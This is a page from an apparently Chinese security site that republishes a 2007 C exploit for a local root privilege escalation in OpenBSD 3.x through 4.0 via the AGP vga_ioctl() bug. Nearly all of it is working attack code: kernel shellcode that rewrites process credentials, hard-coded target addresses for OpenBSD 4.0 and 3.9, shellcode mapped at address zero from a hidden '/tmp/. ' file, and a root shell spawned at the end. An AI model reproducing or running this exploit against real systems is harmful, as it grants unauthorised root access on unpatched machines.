首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit
来源:http://www.critical.lt 作者:Lithuania 发布时间:2007-01-08  

/*

Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit

Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org)
Some code had been stolen from noir's openbsd exploit sources

Fix is available:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch

Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007

Linkejimai neegzistuojancio fronto kariams ;]
*/

#include <sys/param.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/agpio.h>
#include <unistd.h>
#include <err.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/sysctl.h>

#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/
#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/

char shellcode[]=
"\x18\x00\x00\x00"
"\x18\x00\x00\x00"
"\x18\x00\x00\x00" /* some crap */
"\x18\x00\x00\x00"
"\x18\x00\x00\x00"

"\x18\x00\x00\x00" /* jmp 0x00000018 */

"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad"
"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred shellcode */
"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04"

"\xb8\x51\x47\x48\xd0"
"\xff\xe0";

void usage()
{
printf("Usage: crit_obsd_ex target\n\n");
printf("valid targets:\n");
printf("(1)\tobsd 4.0 generic i386\n");
printf("(2)\tobsd 3.9 generic i386\n\n");
exit(0);
}

void get_proc(pid_t pid, struct kinfo_proc *kp)
{
u_int arr[4], len;

arr[0] = CTL_KERN;
arr[1] = KERN_PROC;
arr[2] = KERN_PROC_PID;
arr[3] = pid;
len = sizeof(struct kinfo_proc);
if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
perror("sysctl");
printf("this is an unexpected error, rerun!\n");
exit(-1);
}
}

int main(int ac, char *av[])
{
int i;
void *p;
int fd,failas;
u_long pprocadr;
struct kinfo_proc kp;

printf("\n+--------------------------------------------+\n");
printf("| Critical Security local obsd root |\n");
printf("+--------------------------------------------+\n\n");

if (ac<2) usage();
if(atoi(av[1])==1)
{
for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i];
}
else if(atoi(av[1])==2)
{
for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i];
}
else {usage();}

get_proc((pid_t) getpid(), &kp);
pprocadr = (u_long) kp.kp_eproc.e_paddr;

shellcode[24+5] = pprocadr & 0xff;
shellcode[24+6] = (pprocadr >> 8) & 0xff;
shellcode[24+7] = (pprocadr >> 16) & 0xff;
shellcode[24+8] = (pprocadr >> 24) & 0xff;

printf("[~] shellcode size: %d\n",sizeof(shellcode));

fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);
if(fd < 0)
err(1, "open");

write(fd, shellcode, sizeof(shellcode));
if((lseek(fd, 0L, SEEK_SET)) < 0)
err(1, "lseek");

p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0);
if (p == MAP_FAILED)
err(1, "mmap");

printf("[~] map addr: 0x%x\n",p);
printf("[~] exploiting...\n");
failas = open(AGP_DEVICE, O_RDWR);
syscall(SYS_ioctl, failas, 0x80044103, NULL);

close(failas);
close(fd);

seteuid(0);
setuid(0);
printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid());
execl("/bin/sh", "cyber", NULL);

}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AllMyLinks <= 0.5.0 (index.
·Berlios GPSD <= 2.7 Remote
·Wordpress 2.0.5 Trackback UTF-
·Opera <= 9.10 JPG Image DHT
·NaviCOPA Web Server 2.01 (GET)
·Application Enhancer (APE) 2.0
·L2J Statistik Script <= 0.0
·@lex Guestbook <= 4.0.2 Rem
·Mac OS X 10.4.8 DiskManagement
·FileCOPA FTP Server <= 1.01
·Mac OS X 10.4.8 DiskManagement
·Axiom Photo/News Gallery 0.8.6
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved